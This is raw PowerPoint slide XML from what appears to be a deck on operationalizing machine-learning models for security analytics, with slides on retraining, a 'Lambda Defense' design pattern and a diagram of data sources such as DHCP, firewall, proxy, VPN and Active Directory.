            <a:off x="628650" y="1369219"/>
            <a:ext cx="7886700" cy="3263504"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>When is an ML model Ready</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>When should we re-train?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>How should new data weighted over old data?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>How do we know when a model is ready?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="Screen Shot 2016-08-03 at 3.37.20 AM.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="12151" b="4244"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1622309" y="2976372"/>
            <a:ext cx="2827985" cy="1656350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6069428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17817"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1615450" y="2990089"/>
            <a:ext cx="2827985" cy="1662503"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>Step 5:  Operationalize the Model Life Cycle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Screen Shot 2016-08-03 at 3.36.45 AM.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="3616" t="75524"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4669137" y="3655315"/>
            <a:ext cx="3239951" cy="856850"/>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
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2266499" y="4671282"/>
            <a:ext cx="3733714" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0"/>
              <a:t>How do we programmatically learn new patterns over time?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1369219"/>
            <a:ext cx="7886700" cy="3263504"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>When is an ML model Ready</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>When should we re-train?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>How should new data weighted over old data?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>How do we know when a model is ready?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3416272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The Lambda Defense: A Complex Design Pattern</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2016-08-03 at 3.36.32 AM.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect b="2683"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1251940" y="1103353"/>
            <a:ext cx="3509111" cy="3333617"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Screen Shot 2016-08-03 at 3.36.45 AM.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="3616"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4669137" y="1011451"/>
            <a:ext cx="3239951" cy="3500714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9288137" y="3467294"/>
            <a:ext cx="184731" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15061754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Rectangle 438"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1265586" y="965045"/>
            <a:ext cx="1572785" cy="2077787"/>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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="440" name="Rectangle 439"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3011626" y="1243275"/>
            <a:ext cx="3606179" cy="1799557"/>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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="433" name="Rectangle 432"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1881248" y="3522502"/>
            <a:ext cx="5400911" cy="1518605"/>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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="258" name="Picture 257"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2143443" y="4581240"/>
            <a:ext cx="969102" cy="236543"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="267" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="2239976" y="949072"/>
            <a:ext cx="100979" cy="261656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:sysClr val="window" lastClr="FFFFFF">
              <a:lumMod val="50000"/>
              <a:alpha val="54901"/>
            </a:sysClr>
          </a:solidFill>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rot="10800000" wrap="none" lIns="48218" tIns="24110" rIns="48218" bIns="24110" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="482186">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1275" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="346" name="Rounded Rectangle 345"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1988499" y="3637596"/>
            <a:ext cx="2567500" cy="1257990"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5690"/>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sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2661460" y="3764499"/>
            <a:ext cx="848624" cy="380540"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="284" name="Rounded Rectangle 283"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1398381" y="1045850"/>
            <a:ext cx="1236107" cy="443769"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4307"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1">
              <a:shade val="50000"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="68577" tIns="34289" rIns="68577" bIns="34289" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3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82" y="1103101"/>
            <a:ext cx="1122773" cy="3293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3" name="Picture 362"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816184" y="4014719"/>
            <a:ext cx="212858" cy="260641"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="412" name="Picture 411" descr="data-model-lightblu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519" y="4542450"/>
            <a:ext cx="319535" cy="367565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="414" name="Picture 413"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9866" y="4296214"/>
            <a:ext cx="430019" cy="430019"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="415" name="Picture 414"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92544" y="4387763"/>
            <a:ext cx="430019" cy="430019"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="416" name="Picture 415" descr="storage-hado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00990" y="3866195"/>
            <a:ext cx="430019" cy="430019"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="417" name="Can 416"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1425355" y="1614160"/>
            <a:ext cx="354194" cy="293605"/>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34289" tIns="34289" rIns="34289" bIns="34289" numCol="1" spcCol="38100" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="342900" latinLnBrk="1" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="750" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>DHCP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="750" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Avenir Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="418" name="Can 417"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1308867" y="1873059"/>
            <a:ext cx="473995" cy="477110"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent6"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent6"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent6"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr rot="0" spcFirstLastPara="1" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="34289" tIns="34289" rIns="34289" bIns="34289" numCol="1" spcCol="38100" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="342900" latinLnBrk="1" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="750" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>IMS/IPAM</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="750" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Avenir Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="419" name="Can 418"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1477617" y="2345427"/>
            <a:ext cx="231231" cy="270388"/>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34289" tIns="34289" rIns="34289" bIns="34289" numCol="1" spcCol="38100" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="342900" latinLnBrk="1" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="750" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>FW</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="750" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Avenir Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="420" name="Can 419"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1747141" y="2483605"/>
            <a:ext cx="290986" cy="407459"/>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34289" tIns="34289" rIns="34289" bIns="34289" numCol="1" spcCol="38100" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="342900" latinLnBrk="1" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="750" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Proxy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="750" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Avenir Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="421" name="Can 420"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1396165" y="2638197"/>
            <a:ext cx="316672" cy="293605"/>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34289" tIns="34289" rIns="34289" bIns="34289" numCol="1" spcCol="38100" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="342900" latinLnBrk="1" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="750" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>VPN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="750" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Avenir Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="422" name="Can 421"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1747140" y="2253354"/>
            <a:ext cx="241359" cy="273960"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent3"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent3"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent3"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr rot="0" spcFirstLastPara="1" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="34289" tIns="34289" rIns="34289" bIns="34289" numCol="1" spcCol="38100" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="342900" latinLnBrk="1" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="750" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>AD</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="750" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Avenir Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="423" name="Straight Arrow Connector 422"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1881248" y="1771673"/>
            <a:ext cx="540046" cy="136091"/>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a:off x="1875803" y="2005092"/>
            <a:ext cx="545490" cy="0"/>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a:off x="2071046" y="2389207"/>
            <a:ext cx="684011" cy="7491"/>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7" name="Straight Arrow Connector 426"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2117139" y="2542246"/>
            <a:ext cx="637918" cy="0"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="428" name="Straight Arrow Connector 427"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2138370" y="2701139"/>
            <a:ext cx="569185" cy="1715"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:prstDash val="sysDash"/>
            <a:headEnd type="oval"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="432" name="Rectangle 431"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2519885" y="1554914"/>
            <a:ext cx="2462997" cy="565333"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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latinLnBrk="1" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:sym typeface="Avenir Roman"/>
              </a:rPr>
              <a:t>Real Time Identity Resolution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 17"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5940550" y="3591705"/>
            <a:ext cx="1114034" cy="381660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 18"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5839416" y="4088294"/>
            <a:ext cx="1223986" cy="803708"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
